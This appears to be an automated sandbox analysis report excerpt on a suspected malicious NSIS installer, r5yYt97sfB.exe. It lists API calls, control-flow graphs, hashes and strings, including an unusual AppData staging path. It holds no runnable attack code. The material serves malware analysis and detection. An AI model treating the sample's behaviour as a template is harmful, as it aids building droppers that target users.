                                                                                                                                              • Opcode ID: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
                                                                                                                                              • Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
                                                                                                                                              • Opcode Fuzzy Hash: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
                                                                                                                                              • Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNELBASE(771B3420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0), ref: 004064D1
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004064DD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                                                              • Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
                                                                                                                                              • Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
                                                                                                                                              • Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                              • Opcode ID: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
                                                                                                                                              • Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
                                                                                                                                              • Opcode Fuzzy Hash: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
                                                                                                                                              • Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 186 403d6f-403d81 187 403ec2-403ed1 186->187 188 403d87-403d8d 186->188 190 403f20-403f35 187->190 191 403ed3-403f1b GetDlgItem * 2 call 404247 SetClassLongW call 40140b 187->191 188->187 189 403d93-403d9c 188->189 192 403db1-403db4 189->192 193 403d9e-403dab SetWindowPos 189->193 195 403f75-403f7a call 404293 190->195 196 403f37-403f3a 190->196 191->190 198 403db6-403dc8 ShowWindow 192->198 199 403dce-403dd4 192->199 193->192 203 403f7f-403f9a 195->203 201 403f3c-403f47 call 401389 196->201 202 403f6d-403f6f 196->202 198->199 204 403df0-403df3 199->204 205 403dd6-403deb DestroyWindow 199->205 201->202 223 403f49-403f68 SendMessageW 201->223 202->195 208 404214 202->208 209 403fa3-403fa9 203->209 210 403f9c-403f9e call 40140b 203->210 214 403df5-403e01 SetWindowLongW 204->214 215 403e06-403e0c 204->215 212 4041f1-4041f7 205->212 211 404216-40421d 208->211 219 4041d2-4041eb DestroyWindow EndDialog 209->219 220 403faf-403fba 209->220 210->209 212->208 217 4041f9-4041ff 212->217 214->211 221 403e12-403e23 GetDlgItem 215->221 222 403eaf-403ebd call 4042ae 215->222 217->208 225 404201-40420a ShowWindow 217->225 219->212 220->219 226 403fc0-40400d call 4061a5 call 404247 * 3 GetDlgItem 220->226 227 403e42-403e45 221->227 228 403e25-403e3c SendMessageW IsWindowEnabled 221->228 222->211 223->211 225->208 256 404017-404053 ShowWindow KiUserCallbackDispatcher call 404269 EnableWindow 226->256 257 40400f-404014 226->257 231 403e47-403e48 227->231 232 403e4a-403e4d 227->232 228->208 228->227 234 403e78-403e7d call 404220 231->234 235 403e5b-403e60 232->235 236 403e4f-403e55 232->236 234->222 237 403e96-403ea9 SendMessageW 235->237 239 403e62-403e68 235->239 236->237 238 403e57-403e59 236->238 237->222 238->234 242 403e6a-403e70 call 40140b 239->242 243 403e7f-403e88 call 40140b 239->243 252 403e76 242->252 243->222 253 403e8a-403e94 243->253 252->234 253->252 260 404055-404056 256->260 261 404058 256->261 257->256 262 40405a-404088 GetSystemMenu EnableMenuItem SendMessageW 260->262 261->262 263 40408a-40409b SendMessageW 262->263 264 40409d 262->264 265 4040a3-4040e1 call 40427c call 406183 lstrlenW call 4061a5 SetWindowTextW call 401389 263->265 264->265 265->203 274 4040e7-4040e9 265->274 274->203 275 4040ef-4040f3 274->275 276 404112-404126 DestroyWindow 275->276 277 4040f5-4040fb 275->277 276->212 279 40412c-404159 CreateDialogParamW 276->279 277->208 278 404101-404107 277->278 278->203 280 40410d 278->280 279->212 281 40415f-4041b6 call 404247 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->208 281->208 286 4041b8-4041cb ShowWindow call 404293 281->286 288 4041d0 286->288 288->212
                                                                                                                                              APIs
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
                                                                                                                                              • ShowWindow.USER32(?), ref: 00403DC8
                                                                                                                                              • DestroyWindow.USER32 ref: 00403DDC
                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403E19
                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403E34
                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403EE2
                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403EEC
                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403FFD
                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040401E
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
                                                                                                                                              • EnableWindow.USER32(?,?), ref: 0040404B
                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404068
                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
                                                                                                                                              • lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
                                                                                                                                              • SetWindowTextW.USER32(?,00423748), ref: 004040D0
                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404204
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                              • String ID: H7B
                                                                                                                                              • API String ID: 3282139019-2300413410
                                                                                                                                              • Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                                                              • Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
                                                                                                                                              • Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
                                                                                                                                              • Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 289 4039cc-4039e4 call 406559 292 4039e6-4039f6 call 4060ca 289->292 293 4039f8-403a2f call 406050 289->293 302 403a52-403a7b call 403ca2 call 405c3f 292->302 298 403a31-403a42 call 406050 293->298 299 403a47-403a4d lstrcatW 293->299 298->299 299->302 307 403a81-403a86 302->307 308 403b0d-403b15 call 405c3f 302->308 307->308 309 403a8c-403ab4 call 406050 307->309 314 403b23-403b48 LoadImageW 308->314 315 403b17-403b1e call 4061a5 308->315 309->308 316 403ab6-403aba 309->316 318 403bc9-403bd1 call 40140b 314->318 319 403b4a-403b7a RegisterClassW 314->319 315->314 320 403acc-403ad8 lstrlenW 316->320 321 403abc-403ac9 call 405b64 316->321 332 403bd3-403bd6 318->332 333 403bdb-403be6 call 403ca2 318->333 322 403b80-403bc4 SystemParametersInfoW CreateWindowExW 319->322 323 403c98 319->323 327 403b00-403b08 call 405b37 call 406183 320->327 328 403ada-403ae8 lstrcmpiW 320->328 321->320 322->318 326 403c9a-403ca1 323->326 327->308 328->327 331 403aea-403af4 GetFileAttributesW 328->331 336 403af6-403af8 331->336 337 403afa-403afb call 405b83 331->337 332->326 342 403bec-403c06 ShowWindow call 4064ed 333->342 343 403c6f-403c70 call 4053b5 333->343 336->327 336->337 337->327 350 403c12-403c24 GetClassInfoW 342->350 351 403c08-403c0d call 4064ed 342->351 347 403c75-403c77 343->347 348 403c91-403c93 call 40140b 347->348 349 403c79-403c7f 347->349 348->323 349->332 352 403c85-403c8c call 40140b 349->352 355 403c26-403c36 GetClassInfoW RegisterClassW 350->355 356 403c3c-403c5f DialogBoxParamW call 40140b 350->356 351->350 352->332 355->356 360 403c64-403c6d call 40391c 356->360 360->326
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                                                • Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                                              • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00403A4D
                                                                                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,771B3420), ref: 00403ACD
                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
                                                                                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 00403AEB
                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\magmaet\clenched), ref: 00403B34
                                                                                                                                                • Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7
                                                                                                                                              • RegisterClassW.USER32(00429200), ref: 00403B71
                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403BF4
                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
                                                                                                                                              • RegisterClassW.USER32(00429200), ref: 00403C36
                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                              • API String ID: 1975747703-2802542752
                                                                                                                                              • Opcode ID: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
                                                                                                                                              • Instruction ID: 56c0b88d72ef28cc24ab3b3da6b812fbe5e4610ed82a7e8ff487d4c0aa16eca4
                                                                                                                                              • Opcode Fuzzy Hash: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
                                                                                                                                              • Instruction Fuzzy Hash: E261C270240600BAD720AF66AD45F2B3A7CEB84B09F40447EF945B22E2DB7D69118A3D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 363 402e41-402e8f GetTickCount GetModuleFileNameW call 405d58 366 402e91-402e96 363->366 367 402e9b-402ec9 call 406183 call 405b83 call 406183 GetFileSize 363->367 368 4030e0-4030e4 366->368 375 402fb9-402fc7 call 402d9f 367->375 376 402ecf-402ee6 367->376 383 403098-40309d 375->383 384 402fcd-402fd0 375->384 378 402ee8 376->378 379 402eea-402ef7 call 403358 376->379 378->379 385 403054-40305c call 402d9f 379->385 386 402efd-402f03 379->386 383->368 387 402fd2-402fea call 40336e call 403358 384->387 388 402ffc-403048 GlobalAlloc call 406678 call 405d87 CreateFileW 384->388 385->383 389 402f83-402f87 386->389 390 402f05-402f1d call 405d13 386->390 387->383 411 402ff0-402ff6 387->411 414 40304a-40304f 388->414 415 40305e-40308e call 40336e call 4030e7 388->415 394 402f90-402f96 389->394 395 402f89-402f8f call 402d9f 389->395 390->394 409 402f1f-402f26 390->409 402 402f98-402fa6 call 40660a 394->402 403 402fa9-402fb3 394->403 395->394 402->403 403->375 403->376 409->394 413 402f28-402f2f 409->413 411->383 411->388 413->394 416 402f31-402f38 413->416 414->368 422 403093-403096 415->422 416->394 418 402f3a-402f41 416->418 418->394 420 402f43-402f63 418->420 420->383 423 402f69-402f6d 420->423 422->383 424 40309f-4030b0 422->424 425 402f75-402f7d 423->425 426 402f6f-402f73 423->426 427 4030b2 424->427 428 4030b8-4030bd 424->428 425->394 429 402f7f-402f81 425->429 426->375 426->425 427->428 430 4030be-4030c4 428->430 429->394 430->430 431 4030c6-4030de call 405d13 430->431 431->368
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402E55
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r5yYt97sfB.exe,00000400), ref: 00402E71
                                                                                                                                                • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405D5C
                                                                                                                                                • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\r5yYt97sfB.exe,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00402EBA
                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                              • String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\r5yYt97sfB.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}UI
                                                                                                                                              • API String ID: 2803837635-548520004
                                                                                                                                              • Opcode ID: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
                                                                                                                                              • Instruction ID: 78d4ac72044dd1d4b64dcf5cb9e774c3474f7f20f7d9c099438d2fbc404b67ba
                                                                                                                                              • Opcode Fuzzy Hash: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
                                                                                                                                              • Instruction Fuzzy Hash: 6961E231900215AFDB209F75DD49B9E7AB8AB04359F20817FFA00B62C1CBB99A458B5D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 560 401767-40178c call 402bbf call 405bae 565 401796-4017a8 call 406183 call 405b37 lstrcatW 560->565 566 40178e-401794 call 406183 560->566 571 4017ad-4017ae call 406417 565->571 566->571 575 4017b3-4017b7 571->575 576 4017b9-4017c3 call 4064c6 575->576 577 4017ea-4017ed 575->577 584 4017d5-4017e7 576->584 585 4017c5-4017d3 CompareFileTime 576->585 579 4017f5-401811 call 405d58 577->579 580 4017ef-4017f0 call 405d33 577->580 587 401813-401816 579->587 588 401885-4018ae call 4052e2 call 4030e7 579->588 580->579 584->577 585->584 589 401867-401871 call 4052e2 587->589 590 401818-401856 call 406183 * 2 call 4061a5 call 406183 call 4058c8 587->590 602 4018b0-4018b4 588->602 603 4018b6-4018c2 SetFileTime 588->603 600 40187a-401880 589->600 590->575 623 40185c-40185d 590->623 604 402a55 600->604 602->603 606 4018c8-4018d3 CloseHandle 602->606 603->606 607 402a57-402a5b 604->607 609 4018d9-4018dc 606->609 610 402a4c-402a4f 606->610 612 4018f1-4018f4 call 4061a5 609->612 613 4018de-4018ef call 4061a5 lstrcatW 609->613 610->604 617 4018f9-40228d call 4058c8 612->617 613->617 617->607 617->610 623->600 625 40185f-401860 623->625 625->589
                                                                                                                                              APIs
                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto,?,?,00000031), ref: 004017A8
                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto,?,?,00000031), ref: 004017CD
                                                                                                                                                • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                                                                • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                                • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                                • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                                • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                                • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
